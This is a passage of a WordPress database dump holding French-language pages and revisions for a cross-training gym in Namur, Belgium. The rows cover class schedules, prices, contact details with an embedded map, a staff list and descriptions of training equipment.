(212, 1, '2013-07-03 18:22:23', '2013-07-03 18:22:23', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<p></p>\r\n<p></p>\r\n<p></p>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<p></p>\r\n<p></p>\r\n<p></p>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<p></p>\r\n<p></p>\r\n<p></p>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:22:23', '2013-07-03 18:22:23', '', 11, 'http://www.crosstrainingcenter.be/?p=212', 0, 'revision', '', 0),
(218, 2, '2013-09-17 20:26:02', '2013-09-17 20:26:02', '<h2>Prix</h2>\n<table>\n<tbody>\n<tr>\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\n<td class=\"tcelluleprix\">1 séance : 9.00€\n1 carte de 10 séances : 80.00€ (valable 3 mois)\n1 carte de 20 séances : 120.00€ (valable 4 mois)\nAbonnement 6 mois illimité : 399.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\nSuivi 15,00€</td>\n</tr>\n</tbody>\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-autosave', '', '', '2013-09-17 20:26:02', '2013-09-17 20:26:02', '', 214, 'http://www.crosstrainingcenter.be/?p=218', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(214, 1, '2013-07-03 18:25:11', '2013-07-03 18:25:11', '<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'publish', 'closed', 'open', '', 'prix', '', '', '2013-11-04 17:38:55', '2013-11-04 17:38:55', '', 0, 'http://www.crosstrainingcenter.be/?page_id=214', 0, 'page', '', 0),
(215, 1, '2013-07-03 18:25:05', '2013-07-03 18:25:05', '', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision', '', '', '2013-07-03 18:25:05', '2013-07-03 18:25:05', '', 214, 'http://www.crosstrainingcenter.be/?p=215', 0, 'revision', '', 0),
(232, 1, '2013-07-03 19:31:30', '2013-07-03 19:31:30', '', 'bertrand_bauwin-pti', '', 'inherit', 'open', 'open', '', 'bertrand_bauwin-pti', '', '', '2013-07-03 19:31:30', '2013-07-03 19:31:30', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(217, 1, '2013-07-03 18:23:56', '2013-07-03 18:23:56', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:23:56', '2013-07-03 18:23:56', '', 11, 'http://www.crosstrainingcenter.be/?p=217', 0, 'revision', '', 0),
(220, 1, '2013-06-16 15:15:32', '2013-06-16 15:15:32', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n<h1>Plan d\'accès :</h1>\r\n&nbsp;\r\n<iframe width=\"425\" height=\"350\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-06-16 15:15:32', '2013-06-16 15:15:32', '', 9, 'http://www.crosstrainingcenter.be/?p=220', 0, 'revision', '', 0),
(221, 1, '2013-06-16 15:08:36', '2013-06-16 15:08:36', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:08:36', '2013-06-16 15:08:36', '', 20, 'http://www.crosstrainingcenter.be/?p=221', 0, 'revision', '', 0),
(222, 1, '2013-06-16 13:47:21', '2013-06-16 13:47:21', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\"><img class=\"alignnone size-full wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 13:47:21', '2013-06-16 13:47:21', '', 22, 'http://www.crosstrainingcenter.be/?p=222', 0, 'revision', '', 0),
(223, 1, '2013-07-03 19:02:56', '2013-07-03 19:02:56', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td 